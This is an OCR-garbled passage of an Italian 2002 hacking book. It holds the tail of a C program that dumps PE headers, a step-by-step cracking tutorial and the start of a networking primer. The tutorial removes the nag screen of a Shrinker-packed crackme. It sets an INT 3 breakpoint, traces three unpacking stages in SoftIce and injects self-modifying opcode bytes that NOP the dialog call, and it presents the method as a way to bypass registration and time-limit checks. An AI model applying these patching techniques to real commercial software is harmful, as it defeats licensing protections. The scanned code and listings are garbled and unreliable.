printf("MinorSubsystemVersion :Ox%x\n",ioh.MinorSubsystemVersion); 
printf("Reserved1 :0x%lx\n",ioh.Reserved1); 
printf("SizeOflmage :0x%lx\n",ioh.SizeOflmage); 
printf("SizeOfHeaders :0x%lx\n",ioh.SizeOfHeaders); 
printf("CheckSum :Ox%lx\n",ioh.CheckSum); 
printf("Subsystem :Ox%x\n",ioh.Subsystem); 
printf("DIICharacteristics :Ox%x\n",ioh.DIICharacteristics); 
printf("SizeOfStackReserve :0x%lx\n",ioh.SizeOfStackReserve); 
printf("SizeOfStackCommit :0x%lx\n",ioh.SizeOfStackCommit); 
printf("SizeOfHeapReserve :0x%lx\n",ioh.SizeOfHeapReserve); 
printf("SizeOfHeapCommit :0x%lx\n",ioh.SizeOfHeapCommit); 
printf("LoaderFlags :Ox%lx\n",ioh.LoaderFlags); 
printf("NumberOfRvaAndSizes :0x%lx\n",ioh.NumberOfRvaAndSizes); 
printf("\n"); 

printf("Data Directory Summary\n"); 

printf (" \n"); 

for(i=0;kioh.NumberOfRvaAndSizes;i++) 
{ printf ("\n"); 
switch(i) 

{ case IMAGEDIRECTORYENTRYEXPORT: 
printf("Export Directory :\n"); 
break; 

case I M AG E D I R ECTO R Y_E NTRYI M PO RT : 
printfflmport Directory :\n"); 

case IMAGE_DIRECTORY_ENTRY_RESOURCE: 
printffResource Directory :\n"); 
break; 

case IMAGE DIRECTORY ENTRY EXCEPTION: 
printf("Exception Directory :\n"); 
break; 

case IMAGE DIRECTORY ENTRY SECURITY: 
printf("Security Directory :\n"); 
break; 

case I M AG E D I R ECTO R Y_E NTRY B AS E R E LOC : 
printf("Base Relocation Table :\n"); 
break; 

case IMAGE DIRECTORY ENTRY DEBUG: 
printf("Debug Directory :\n"); 

case IMAGE_DIRECTORY_ENTRY_COPYRIGHT: 
printf ("Description String :\n"); 
break; 

case I MAG E D IRECTORY ENTRY G LOBALPTR : 
printf("Machine Value (MIPS GP) :\n"); 
break; 
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printf("TLS Directory :\n"); 
break; 

case IMAGEDIRECTORYENTRYLOADCONFIG: 
printf("Load Configuration Directory :\n"); 

case IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT: 
printf("Bound Import Directory in headers :\n"); 
break; 

case IMAGE DIRECTORY ENTRYJAT: 

printf("lmport Address Table :\n"); 

break; 
default: 

printf("Unknown Directory :0x%x\n",i); 
break; 

} 

printf("VirtualAddress :Ox%lx\n",ioh.DataDirectory[i].VirtualAddress); 
printf("Size :Ox%lx\n",ioh.DataDirectory[i].Size); 

} 

printf("\n"); 

} 

void loadsectionheaderinfo(word snum) 

{ printf("\nLoading section header info : section number %d\n",snum); 
if(lseek(pefile,shoffset+snum*sizeof(ish),SEEK_SET)==-1) 
{ printf("Fatal Error:Error seeking Section Header\n"); 

close(pefile); 

exit(1); 

} 

if(read(pefile,&ish,sizeof(ish))!=sizeof(ish)) 

{ printf("Fatal Error:Error reading Section header info\n"); 

close(pefile); 

exit(1); 

} 

} 

void sectionheadersummary(void) 
{ intij; 

char namebuff[IMAGE_SIZEOF_SHORT_NAME+2]; 
printf ("Section Header summary\n"); 

printf(" \n"); 

for(i=0;i<ifh.NumberOfSections;i++) 
{ loadsectionheaderinfo(i); 

for(j=0;j<IMAGE_SIZEOF_SHORT_NAME;j++) namebuff[j]=ish.Name[j]; 

namebufflj]=0; 

printf("Section Name : %s\n",namebuff); 

printf("VirtualSize :Ox%lx\n",ish.Misc.VirtualSize); // union ish.Misc 
printf("VirtualAddress :Ox%lx\n",ish.VirtualAddress); 
printf("SizeOfRawData :0x%lx\n",ish.SizeOfRawData); 
printf ("PointerToRawData :Ox%lx\n",ish.PointerToRawData); 
printf ("PointerToRelocations:Ox%lx\n",ish.PointerToRelocations); 
printf ("PointerToLinenumbers:Ox%lx\n",ish.PointerToLinenumbers); 
printf ("NumberOfRelocations :0x%x\n",ish.NumberOfRelocations); 
printf ("NumberOfLinenumbers :0x%x\n",ish.NumberOfLinenumbers); 
printf("Characteristics :Ox%lx\n",ish.Characteristics); 
if(ish.Characteristics&0x00000020) printf("Property :Code Section\n"); 

if(ish.Characteristics&0x00000040) printf("Property :lnitialized data section \n"); 

if(ish.Characteristics&0x00000080) printf("Property :Uninitialized data section \n"); 

if(ish.Characteristics&0x04000000L) printf("Property :Section cannot be cached \n") 

if(ish.Characteristics&0x08000000L) printf("Property :Section is not pageable \n"); 

if(ish.Characteristics&0x10000000L) printf("Property :Section is shared\n"); 

if(ish.Characteristics&0x20000000L) printf("Property :Executable section \n"); 

if(ish.Characteristics&0x40000000L) printf("Property :Readable section \n"); 

if(ish.Characteristics&0x80000000L) printf("Property :Writable section\n"); 

} 

} 
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// Main Application 

// 

Il 

// 

// readcommandline 

// - processes command line 

// - checks options for conflicts,validity,etc 

// 

void readcommandline(int argcchar *argv[]) 
{ int i; 
for(i=1 ;kargc;i++) 
{ if(argv[i][0]=='-') 
{ switch(argv[i][1]) 
{ case 'h': 
case 'H': 
options. help=true; 
break; 
default: 

printf("L)nknown option : %c\n",argv[i][1]); 
exit(1); 

} 

} 

else 

{ if(!options.file[0]) 
{ strcpy(options.file,argv[i]); 

} 

else 

{ printf("File ? %s or %s ?\n",options.file,argv[i]); 
exit(1); 

} 

} 

} 

if(!options.file[0]) 

{ printf("Fatal error:No file specified\n"); 
exit(1); 

} 



int main(int argcchar *argv[]) 
{ initialise(); 

readcommandline(argcargv); 

pefileinit(); 

sectionheadersummaryO; 
pefileshutdownQ; 




Nell'ambito delle operazioni fattibili con tanto di disassemblatore e debugger ne esistono 
alcune più complesse delle altre a causa di metodi usati per nascondere il codice. 
Esistono sistemi che eseguono una compattazione dei segmenti dati per cui il debugging può 
avvenire solo ed esclusivamente quando il codice è stato letto e decompresso dal loader del 
programma stresso. 

Il discorso è anche in relazione all'uso di quelli che sono gli strumenti collaterali del cracker 
utilizzati per la manipolazione dei segmenti. 
Ma forse non sono stato molto chiaro. 

Tutto questo discorso che è stato fatto in questo capitolo era indirizzato a spiegare il 
funzionamento di alcuni pacchetti che generalmente sono utilizzati dal cracker e non tanto 
dall'hacker, almeno ai livelli iniziali. 

Come abbiamo visto inizialmente in questo capitolo ed in particolar modo nei capitoli dedicati 
ai buffer overflow, le tecniche hacking più sofisticate pretendono un analisi dei software a 
bassissimo livello alla ricerca di quelle che sono le loro caratteristiche assembler. 
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Oltre ai disassemblatori e ai debugger esistono pacchetti come PROCDUMP i quali 
permettono di vedere i segmenti e di eseguire il dump di tali programmi una volta che questi 
sono stati caricati in memoria. 



Un esempio di esame per entrare in un gruppo hacker 

In america l'adesione ad un gruppo è vincolato da un esame che deve essere fatto 
inizialmente. 

In pratica si deve eliminare la maschera inziale di questo programma il quale possiede un 
sistema Shrinker complesso in quanto tre sezioni scompattano reciprocamente le porpie 
successive per cui per riuscire a scrivere un codice automofdificante che elimini la 
visualizzazione della dialog richiesta si deve eseguire un bel traffico. 
Cercate sulla rete CIA. EXE o prelevatelo dal mio sito : 



In alcuni casi è sufficiente un pò di buona volontà per riuscire ad individuare il punto in cui 
viene eseguita una, o più, chiamate alle funzioni di controllo. 

Il problema sussiste quando qualche sezione del programma è compattata o codificata con 
qualche sistema quale Shrinker o simili. 

Supponiamo di aver a che fare con un programma normale ovvero senza nessuna sezione 
compattata. 

Seguendo con Softlce il programma potremmo giungere al punto in cui una certa cali euivale 
alla chiamata alla funzione di controllo sulla registrazione del programma. 
Potremmo trovarci davanti ad una sequenza di istruzione del tipo : 



.text:1 0004756 68 00 00 00 80 push 
.text:1 000475B E8 50 52 00 00 cali 



80000000h 
sub 0 100099B0 



Cali Procedure 



Bloccando la cali eviteremmo il controllo sulla durata in tempo del programma o altre funzioni 
di protezione di questo tipo. 

Avendo capito questo potremmo sostituire la cali con una serie di NOP oppure con un 
istruzione che occupi i 5 bytes della cali stessa. 
I codici operativi di questa cali sono : 



Trovati i codici con cui sostituire questi potremmo editare con un editor esadecimale il 
programma, cercare questi codici e sostituirli con quelli nuovi. 

Se il programma è compattato con Shrinker o simili non riusciremmo mai a fare la ricerca in 
quanto fino al momento in cui il programma non va in esecuzione i codici operativi sarebbero 
incomprensibili. 

In pratica attivando il programma entra in funzione il decompattatore il quale normalizza in 
memoria il codice che verrà eseguito. 

Quindi fino a quando il programma non va in esecuzione noi non riusciremo a trovare la 
sequenza giusta relativa al codice da modificare. 

Oltre a non poter trovare le istruzioni non potremmo neppure scrivere le modifiche in quanto 
queste verrebbero manipolate dal decompattatore. 

In questo caso l'esecuzione della patch è più complessa in quanto le operazioni da fare sono 
le seguenti. 



avare una zona di memoria non usata dove scrivere il codice che va a modificare 
locazioni. 

2. Trovare il punto in cui termina il decompattatore. 

Inserire ali fine di questo un chiamata al codice che abbiamo scritto nella memori; 



Se avessimo a che fare con un programma normale potremmo trovarci nel caso in cui alla 
locazione : 
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0040:1234 E8 50 52 00 00 dovremmo inserire 0040:1234 B8 00 00 00 00 

Nel caso di un programma compattato dovremo scrivere il codice che va a cambiare ogni 
singolo byte dentro ad una zona di memoria vuota o non usata. 
In pratica dovremo scrivere (scritto in forma simbolica) : 



memoria vuota non usata 



mov byte ptr [00401234], B8 
ov byte ptr [00401235], 00 
ov byte ptr [00401236], 00 
mov byte ptr [00401237], 00 
004011 



; Primo codice cambiato B8 
; Secondo codice 00 
; Terzo codice 00 
; Quarto codice 00 
codice 



A questo punto dobbiamo trovare dove inserire la chiamata a questa parte di codice che 
sicuramente deve essere dopo a che la funzione di decompattazione ha finito di normalizzare 
la memoria dove deve essere scritta la modifica. 
Iniziamo a vedere come fare. 

Diciamo subito che per fare la prova useremo un programmino che viene utilizzato come 
esame di ammissione ad un gruppo di hacker americano. 
Il programma si chiama CIA. EXE. 

Quando attivato questo mostra una maschera che dovremo eliminare. 



A C E E ■ ■ 



C C IM I C C 



Ci;ilii.hl 



Per prima cosa dobbiamo avere i seguenti strumenti installati. 
Per vedere le sezioni e le informazioni del file eseguibile usiamo ProcDump. 
Come debugger invece usiamo Softlce e come editor esadecimale HEX Editor. 
Carichiamo ProcDump e richiediamo il PE Editor. 



Ìt '■£* uj Viri*: t iA h <rtù* J i3 -j M< J '■. 



la™ LJ 



rM^^mi-rWvfiwìm riviri 0CWMHJ U00W00U FFFU21 

tv:i»:h*,«\: ( *<fJoAfcK«£ fFfjjlTj K4XH00 KnCCHU FFFlGCS 

(•*<»J(*i«K-^w-l*ti*IK*^i<tW. FFFB1I S»»S VK.VKD FfTICKiS 

rWnyiiitm fffììtSi 9OMW00 «BfflEO Pfr;iJfi 

É<:,É'j..it.U f .'.(*:tdi*.à- fff:34« «446» Kfll»M FfriHfl 



II. E? 



L Wik™:^latf'.:ldl? <a 

cWÒ™\[}ltlITl'''*i?<l 



'EAWfll 



ooomoo ooowooo 

»«™» oowcom 

MfdiOT nooriom 

Ùff'kLllI Ù0Ù1IÙ0Ù 



4 



FwHdFt j 



I 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Appena premuto il tasto per evitare il PE avremo : 



PE Structure Editor 



r Header Infos- 
Entry Point : 



000SC3DAÌ 



Size of image : |00090000 



- Structures Editor- 



Sections 



Directory 



OK 



-Àpply changes nnethod : 
(? Only tq PE header 
file 



Lo scopo di quello che faremo e quello di trovare nel file fisico l'offset dell'entry point di questa 
sezione in cui andremo a modificare la prima istruzione eseguita con una chiamata 
all'interrupt 3 in modo da poterla intercettare. 

Esiste un breakpoint di Softlce che permette di intercettare un interrupt che useremo con l'int 
3. 

Ci interessa fare ijn modo che Softlce si blocchi nell'istante in cui viene eseguita la prima 
istruzione di questa sezione. 

A questo punto troviamo l'offset fisico del file e andiamo a cambiare con un editor 
esadecimale il codice operativo presente (in genere 0x83) sostituendolo con un INT 3 (OxCC). 
L'entry point è 0008C3DA. 

Editiamo il PE e cerchiamo la sezione più prossima a questo entry point. 
La più vicina è la sezione .load a 0008B000. 



Sections Editor 



■Sections Infornnations : 



Nanne 


Virtual Size 


Virtual Offset 


| Flaw Size 


Raw Offset 


Characteristics 




.rdata 


0000001 C 


0007D000 


00000200 


00048A00 


40000040 




.data 


0000BFAC 


0007E000 


00001 SOO 


00000800 


C0000040 


\ 


.idata 


00000858 j 




0000OA00 


00001 EOO 


C0000040 




.load 


00002D26 C 


0008B000J 


00002E00 


00002800 


68040020 




.reloc 


000005F4 




00000S00 


00005600 


42000040 




.rsrc 


00001000 


0008F000 


00001000 


00005C00 


50000040 


z. 



z. Cancel I 



Prendiamo 8C3DA e sottraiamo 8B000 ricavando 13DA. 

L'offset segnato per questa sezione S 0x2800 a cui andiamo sommare 0x1 3DA ottenendo 
0x3BDA. 

Carichiamo HEXWork o un editor esadecimale e leggiamo CIA. EXE. 
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Richiamiamo la funzione per fare un GOTO all'offset calcolato. 

Infatti alla locazione a cui è stato eseguito il salto troviamo il codice 0x83. 
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Sostituiamolo con il codice dell'int 3 (Oxcc) e salviamo il tutto. 

Entriamo in Softlce battendo CTRL D e inseriamo un BREAKPOINT basato sulla chiamata 
d'interrupt a fine di intercettare l'int 3 appena inserito. 
Digitiamo in Softlce : 



A questo punto attiviamo il programma CIA. EXE. 

Chiaramente appena in esecuzione il programma lancierà un INT 3 che il brakpoint 
intercetterà visualizzandoci Softlce. 

Chiaramente appena attivato Softlce per poter proseguire dovremo di nuovo inserire il 
codice originale che avevamo sostituito. 
Facciamo questo mediante l'istruzione di Softlce : 

6 Gip 83 

Chiaramente il punto in cui l'int 3 si trova è a 0040000 + 8C3DA ovvero a 0048C3DA. 
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L'image base lo vediamo sempre da ProcDump. 




Ora dobbiamo trovare dove si trova la cali che attiva la maschera. 

Chiaramente prima di trovare questa verrà eseguita dal programma la routine di 
decompattazione. 

Armiamoci di pazienza e usiamo Softlce con tanti F1 0 per eseguire lo step by step. 

Usando F10 dovremo usare la tecnica di inserire prima di una cali un breakpoint in modo tale 

di non dover ripetere tutte le volte la stessa sequenza. 

F10 non entra nella cali per cui ad un certo punto vedrete la finestra che compare. 
Se abbiamo inserito prima di tale cali un breakpoint non dovremo, riattivando il programma, 
ripetere la sequenza di F10.F10 ecc. ma semplicemente premendo F5 arriveremo fino a 
prima della cali. 

Arrivati alla cali useremo F8 per entrare con il trace dentro e dopo rinizieremo con F10. 

Anche in questo caso la finestra comparirà di colpo. 

Usiamo sempre i breakpoint per evitare la ripetizione tutte le volte. 

Ricordiamoci anche che ogni volta che lanciamo CIA. EXE dovremo sostituire l'int 3 con 
l'istruzione il cui codice operativo è 83 (cmp dword ptr [xxxxx],0). 
La prima cali si trova a 0048C45C. 



:0048C455 push [ebp+10] 
:0048C458 push [ebp+OC] 
:0048C45B push esi 
:0048C45C cali CRACKME.0048C467 
:0048C461 pop edi 



La seconda cali a 0048CADF. 




Bisogna dire che alle istruzioni dopo a queste calls il programma non torna mentre la cali che 
cerchiamo noi viene eseguita e il programma dopo ritorna all'istruzione successiva 
continuando l'esecuzione. 

La cali che attiva la dialog è all'indirizzo 004601 64. 

Ora se noi in corrispondenza alla prima cali cercassimo d vedere che cosa si trova a 
quell'indirizzo ci accorgeremmo che non esiste nulla di quello che vediamo quando ci 
arriviamo sopra. 

Questo perchè non è ancora stata attivata la funzione di decompattazione di quella zona di 
memoria. 

Ora dovremo vedere dove di fatto inizia e finisce la routine di scompattazione. 
La seconda cali, quella a 0048CADF, ci invia a 0047B000. 

Se arrivati a questo punto richiediamo di vedere la memoria a 00460164 mediante l'istruzione 
di Softlce : 

d 004601 64 

Ci accorgeremo che nella finestra di visualizzazione dei dati non ci viene mostrato nulla. 
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A questo punto, a 0047B000, inizia una parte di codice che esegue un loop e che termina a 
0047B052. 

Arrivati a questa ultima locazione vedremo che i dati della finestra aperta con d 00460164 ci 
vengono visualizzati. 

Questo significa, trovato in questo modo in modo brutale, che il codice tra 0047B000 e 
0047B052 è quello che scompatta la zona in cui ci interessa cambiare i codici operativi della 
cali alla dialog. 

:0047B000 push ebp 
:0047B001 push edi 
:0047B002 push esi 
:0047B003 push edx 
:0047B004 push ecx 
:0047B005 push ebx 
0047B006 cali CRACKME.0047B00B 
0047B00B pop ebp 
0047B00C mov edx, ebp 
0047B00E sub ebp, 00402E1B 
0047B014 sub edx, dword ptr [ebp+00402E7A] 
0047B01 A sub edx, 0000000B 
.0047B01 D mov dword ptr [ebp+00402E83], edx 
:0047B023 lea esi, dword ptr [ebp+00402E82] 
:0047B029 movzx esi, byte ptr [esi] 
:0047B02C mov edi, ebp 
:0047B02E lea ebx, dword ptr [ebp+00402E83] 
:0047B034 mov ebx, dword ptr [ebx] 
:0047B036 lea eax, dword ptr [edi+00402E87] 
:0047B03C mov eax, dword ptr [eax] 
:0047B03E add ebx, eax 
:0047B03E add ebx, eax 
:0047B040 lea ecx, dword ptr [edi+00402E8B] 
:0047B046 mov ecx, dword ptr [ecx] 
:0047B048 sub byte ptr [ebx], 7B 
:0047B04B ine ebx 
:0047B04C loop 0047B048 
:0047B04E add edi, 00000008 
0047B051 dee esi 
0047B052 jne 0047B02E 
0047B054 mov eax, dword ptr [ebp+00402E7E] 
0047B05A mov ebx, dword ptr [ebp+00402E83] 
0047B060 add eax, ebx 
0047B062 pop ebx 
:0047B063 pop ecx 
:0047B064 pop edx 
:0047B065 pop esi 
:0047B066 pop edi 
47B067 pop ebc 



Quando è stato eseguito questo codice l'ultima istruzione (jmp eax) esegue un salto a 
0047A000 locazione alla quale troviamo esattamente lo stesso codice trovato a 0047B000. 
Anche in questo caso il codice termina con un salto (jmp eax) a 00479000 locazione alla 
quale per la terza volta troviamo esattamente lo stesso codice terminante con un ulteriore 
JMP che questa volta fa saltare alla zona in cui si trova la nostra chiamata. 
Il salto dell'ultima volta S a 004601 1C (ricordate che la calla alla dialog si trova a00460164 
ovvero poco più avanti di dove si arriva con il salto). 
Come mai il codice è uguale tre volte ? 

Ogni parte di codice decompatta il suo successivo e questo ci complica la vita in quanto dal 
primo blocco non potremo andarea modificare il codice del terzo in quanto al tempo 
dell'esecuzione del primo il tezro non è ancora scompattato. 
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In questo modo dovremo scrivere 4 blocchi di codice in un zona di memoria non usata e 
prima del primo blocco ne dovremo richiedere l'esecuzione della prima parte, prima della 
seconda dovremo richidere l'esecuzione di una seconda parte e cosi via. 
Le sezioni compattate con Shrinker sono tre e guardate un po la finezza per settare l'indirizzo 
diverso . 

Anzi, prima di vederlo ricordatevi che la cali salva nello stack l'indirizzo di ritorno che sarebbe 
quello successivo alla cali stessa. 



0047B005 push ebx 
0047B006 cali CRACKME.0047B00B 
0047B00B pop ebp 
0047B00C mov edx, ebp 




La cali chiama la locazione successiva (cali 0047B00B) e l'istruzione dove arriva con la cali 

estrae immediatamente l'indirizzo salvato dalla cali stessa mettendolo in ebp. 

In pratica ebp contiene l'indirizzo stesso di dove si trova la pop ebp. 

Nel modulo in cui le istruzioni sono a 0047B000 l'indirizzo in EBP diventa 0047B00B. 

Nella parte a 0047A000 in EBP troveremo 0047A00B ed infine nella parte a 00479000 

avremo in EBP 0047900B. 

Ritorniamo al punto in cui abbiamo stabilito che l'ultimo JMP dei tre moduli uguali salta a 
004601 1C. 

Ora potremmo cercare in CIA. EXE una zona di memoria non usata. 

Con l'editor esadecimale andiamo a vedere se esiste una zona vicina a quella in cui abbiamo 
l'entry point, a zero. 

Troviamo una zona all'offset in decimale 27232. 
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Per evitare di fare calcoli particolari editiamo, sempre con l'editor esadecimale, questa zona 
di memoria e scriviamoci dentro una stringa da usare con le funzioni di ricerca di Softlce. 
Ad esempio scriviamoci PIPPO (che fantasia). 



00027232 C007 0700 E00F 0000 FC3F 0000 FC3F 0000 

00027248 5049 5050 4F10 0000 0000 0000 0000 0000 PIPPO.. 
00027264 0000 0000 0000 0000 0000 0000 0000 0000 

Attiviamo nuovamente il programma, dopo aver salvato le modifiche apportate con l'editor 
esadecimale, e cerchiamo la locazione dove si trova PIPPO con : 



sOIffffffff 'PIPPO 



La ricerca ci indica che la stringa viene trovata a 0048FE70 zona di memoria in cui ora 
dovremo scrivere il codice che va a modificare i codici operativi della cali che attiva la dialog. 
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Per vedere i codici come devono essere modificati eseguiamo il programma fino a giungere 
alla locazione in cui si trova la cali a 004601 64. 
Il codice operativo a 004601 64 è: 



E8 73 9A FF FF che dovremo cambiare in 5 NOP consecutivi ovvero 

00460164 90 NOP 

00460165 90 NOP 

00460166 90 NOP 

00460167 90 NOP 

00460168 90 NOP 




Nella zona di memoria vuota dovremo scrivere diverse parti di codice e vediamo ora quali. 
Questi NOP dovranno essere scritti dentro ad una zona che viene decodificata dal terzo 
blocco di codice uguale quello visto. 
Quando si deve scrivere dentro ? 

Per ora è ancora impossibile in quanto il primo blocco di codice, quello visto prima, 
decompatta il secondo mentre il secondo decompatta il terzo per cui la questione si complica 
ulteriormente. 

In pratica alla cali [ebp-20] dovremo inviare il programma ad eseguire un altro codice che 
dovremo scrivere e che dovrà andare a modificare la prima jmp eax alla fine del primo blocco. 
Vi chiederete per inviarlo dove ? 

Se dopo l'esecuzione del primo blocco il secondo è scompattato dovremo prima di fare il salto 
inviare ad un codice che modifica la seconda jmp del secondo blocco. 
Questa jmp del secondo blocco infine eseguirà un codice che modifica la jmp del terzo. 
Sono sicuro che non avete capito, non perch, non siete intelligenti, ma solo per il fatto che mi 
sono spiegato da cane. 

Per farvi capire che cosa dobbiamo fare guardate il seguente diagramma. 
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Questo è il flusso normale. 

La prima cali (cali [ebp-20]) chiama il primo blocco il quale scompatta il secondo. 

Una volta scompattato il secondo lo richiama e questo scompatta il terzo. 

Finito di scompattare il terzo lo richiama e questo scompatta la zona dove in effetti esiste la 

cali alla dialog. 

A questo punto nella zona di memoria libera scriviamo il codice che va a modificare parte del 

codice del primo blocco. 

AL posto della prima cali mettiamo : 

:0048C4DC push [ebp+08] 
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:0048C4DF cali CRACKME2.0048FE95 ;Chiama la funzione scritta nella zona a 0 
:0048C4E4 cali [ebp-20] 
In questa zona abbiamo scritto : 
:0048FE95 mov byte ptr [0047B065], E9 
:0048FE9C mov byte ptr [0047B066], 4F 
:0048FEA3 mov byte ptr [0047B067], 4E 
:0048FEAA mov byte ptr [0047B068], 01 
:0048FEB1 mov byte ptr [0047B069], 00 
:0048FEB8 ret 

Questa seuqenza di istruzioni andrà a scrivere a 0047B065 jmp 0048feb9. 
Vedete che si va ad inserire a certi indirizzi i codici operativi delle nuove istruzioni. A 
047B065 c'è: 




:0047B065 pop esi 
:0047B066 pop edi 
:0047B067 pop ebp 
:0047B068 jmp eax 



L'istruzione che dovremo mettere dovrebbe sustituire la JMP EAX la quale occupa come 
codici operativi solo due byte. 

Noi la sostituiremo con una cali che invieràad un'altra parte di codice scritta nella zona vuota. 
Jmp 0048Feb9 

Questa istruzione sfortunatamente occupa 5 bytes per cui per non andare a rompere le 
scatole alla memoria dopo la jmp eax iniziermo a scriverla 3 bytes prima a partire da 
0047B065. 

Le POP ESI, EDI e EBP che copriamo le metteremo nel nostro codice il quale eseguirà: 



scrivi le nuove istruzioni in 0047 A065 fai le pop esi, edi e ebp coperte 
esegui il jmp eax 




Il flusso diventa come il seguente : 
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Il codice scritto nella zona vuota (che corrisponde a quello nei rettangoli azzurri) è .quello che 
seguirà. 

Questa parte èscritta a partire da 0048FE6D per arrivare a 0048FE94. 

Per mantenere questo indirizzo l'offset in cui scrivere i codici operativi sul disco dovrebbe 

partire da 27244 (decimale). 

Non vorrei essere stato impreciso ma c'èda perderci gli occhi a fare questi lavori. 

Provate a scrivere una sola file di codici esadecimali legati ad un istruzione ad un offset del 

file tramite l'editor esadecimale e andate a vedere con il debugger dove èstata messa con 

precisione. 



C6056401 460090 MOV 

C6056501 460090 MOV 

C6056601 460090 MOV 

C6056701 460090 MOV 

C6056801 460090 MOV 
5E POP ESI 
5F POP EDI 



BYTE PTR [004601 64], 90 
BYTE PTR [00460165],90 
BYTE PTR [004601 66], 90 
BYTE PTR [004601 67], 90 
BYTE PTR [004601 68],90 



La parte appena vista èquella che verràrichiamato dall'ultimo blocco e che va a mettere i 5 
NOP sulla cali della dialog. 

Questa parte modifica il codice del primo blocco a 0047B065 e è scritta a partire da 
0048FE95 per arrivare a 0048FEB8. 



C60565B04700E9 


MOV 


BYTE 


PTR 


[0047B065] 


,E9 


C60566B047004F 


MOV 


BYTE 


PTR 


[0047B066] 


,4F 


C60567B047004E 


MOV 


BYTE 


PTR 


[0047B067] 


,4E 


C60568B0470001 


MOV 


BYTE 


PTR 


[0047B068]. 


01 


C60569B0470000 


MOV 


BYTE 


PTR 


[0047B069], 


00 



In questo caso, dato che la chiamata è prima della cali [ebp-20] 

non dobbiamo ripristinare i tre pop che normalmente nei blocchi di decodifica andiamo a 
coprire. 

Questa parte modifica il codice del secondo blocco a 0047A065 ed S presente a partire da 
0048FEB9 per arrivare a 0048FFE0 



C60565A04700E9 MOV 

C60566A0470077 MOV 

C60567A047005E MOV 

C60568A0470001 MOV 

C60569A0470000 MOV 
5E POP ESI 
5F POP EDI 
5D POP EBP 



BYTE PTR [0047A065],E9 
BYTE PTR [0047A066],77 
BYTE PTR [0047A067],5E 
BYTE PTR [0047A068],01 
BYTE PTR [0047A069],00 



Questa parte modifica il terzo blocco a 00479065. 
Infine questo è locato da 0048FEE1 a 0048FF08 



0000:6AE1 C60565904700E9 MOV 

0000:6AE8 C6056690470003 MOV 

0000:6AEF C605679047006E MOV 

0000:6AF6 C6056890470001 MOV 

0000:6AFD C6056990470000 MOV 
0000:6B04 5E POP ESI 
0000:6B05 5F POP EDI 
0000:6B06 5D POP EBP 



BYTE PTR [00479065], E9 
BYTE PTR [00479066],03 
BYTE PTR [00479067],6E 
BYTE PTR [00479068],01 
BYTE PTR [00479069], 00 



Queste parti di codice vanno a scrivere le nuove istruzioni. 
Ora dobbiamo solo modificare la prima cali che da : 



per farla diventare 
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:0048C4DF cali 0048fe95 
:0048C4E5 cali [ebp-20] 




Questo dovremo andare con l'editor esadecimale a cambiarlo. 
Segnatevi i codici operativi della semplice cali [ebp-20]. 

Scrivete le due istruzioni con la funzione di assemblaggio di Softlce (a 0048c4df) e poi 
segnatevi anche in questo caso i codici operativi. 

Cercate con l'editor esadecimale la prima sequenza di codici e sostituiteli con i secondi. 
Nella zona di memoria libera dovremo scrivere tutti i codici operativi visti nelle modifiche 
precedenti. 

C6056401 460090C6056501 460090C6056601 460090 
C6056701 460090C6056801 4600905E5F5DFFE0 
C60565B04700E9C60566B047004FC60567B047004E 
C60568B0470001 C60569B0470000C3 
C60565A04700E9C60566A0470077C60567A047005E 
C60568A0470001C60569A04700005E5F5DFFE0 
C60565904700E9C6056690470003C605679047006E 
C6056890470001C60569904700005E5F5DFFE0 



Come vi ho già detto dovrebbe partire da 27244. 

La seguente è l'immagine dell'editor esadecimale dove ho scritto i codici : 
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Dopo tutto questo tran tran lanciando il programma non dovremmo più vedere la maschera 
iniziale e arrivare subito al menu. 

Il compito d'esame del gruppo hacker è quello di eliminare la maschera all'attivazione ma non 
quella con il tasto about (che è la stessa all'attivazione). 
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La rete e i protocolli 
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Concetti generali 



Un Network Operating System (NOS) controlla interazione tra tutte ble macchine di una 
rete. 

Il sistema operativo di rete è il responsabile del controllo relativo al mezzo con cui i dati 
vengono trasmessi sulla rete stessa e gestisce il modo con cui una macchina invia questi 
verso un'altra. 

Il NOS ha anche la responsabilità di gestire il tempismo con cui I pacchetti di dati vengono 
inseriti sulla rete. 

La Network Interface Card (NIC) invece è l'adattatore che generalmemnte è alloggiato 
dentro ad uno slot dei PC che gestisce la comunicazione sulla rete stessa. 



Tutti i sistemi che devono trasmettere e ricevere sulla rete devono disporre di queste 
interfacce. 

Nel modello Client-Server un client è una macchina inizializza un richiesta verso un server. 




Una Locai Resource è qualsiasi periferica (optical drive, printer, scanner, modem, e cosi 
via) che è connessa alla vostra macchina. 



your machine 




Locai Resources 



Un Nodo è qualsiasi device sulla rete (server, workstation, printer, scanner, o qualsiasi altro 
tipo di periferica) a cui si accede direttamente dalla rete. 

Un nodo possiede un nome unico o un IP mediante il quale la rete lo può identificare. 



Network 




Nodc 



Nodc 



Node 



Nodc 



Un Concentratore è un device che può concentrare diverse reti 



lamzzznxD 

UnHub è un device di rete multiscopo che dsi trova al centro di una rete a stella. 
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Un Bridge è un device che serve a connettere reti che utilizzano protocolli simili. 



Un Router è un device di rete che connette dverse LAN a cui è affidata la gestione delle 
strade che I pacchetti devono fare per passare da un sistema ad un altro. 




Un Gateway esegue il forward di dati tra reti IP. 




Un Backbone è un set di nodi e links connessi tra loro 
Una rete a stella non possiede backbone. 




I protocolli di I nternet 

In genere una trattazione troppo teorica complica notevolmente la comprensione di certi 
argomenti e in questo caso il sistema completo legato al funzionamento della rete è 
veramente complesso anche perché dotato di un infinità di meccanismi distribuiti su un certo 
numeri di livelli. 

Ogni livello si interessa di una certa problematica e per fare questo deve utilizzare un certo 
numero di protocolli alcuni dei quali legati al funzionamento generale mentre altri relativi a 
servizi specifici. 

Chiaramente questi ultimi pur non essendo considerati fondamentali possiedono una certa 
importanza anche perché sono di fatto molto utilizzati. 

Mi riferisco a certi protocolli essenziali legati al basso livello come nel caso del TCP e IP e di 

quelli a più alto livello come per quanto riguarda FTP, http, SMTP ecc. 

Questi saranno gli argomenti di questo capitolo e dato che dal punto di vista della 

comprensione sono sicuramente tra le cose più complesse sarà meglio prima fare due 

chiacchere sul metodo da utilizzare per affrontare questi argomenti. 

Come tutte le problematiche legate all'informatica la buona comprensione dipende dalla 

capacità di astrazione che una persona possiede. 

Un trucco di fatto esiste ed è quello di cercare di portare come esempi alcuni reali che 
riescano a creare dei modelli mentali sufficientemente validi. 

Ma partiamo dall'inizio dicendo solo due cose su quelle che sono state le origini di Internet. 
L'idea originale del meccanismo che sta alla base del tutto fu quella di Donald Davies di 
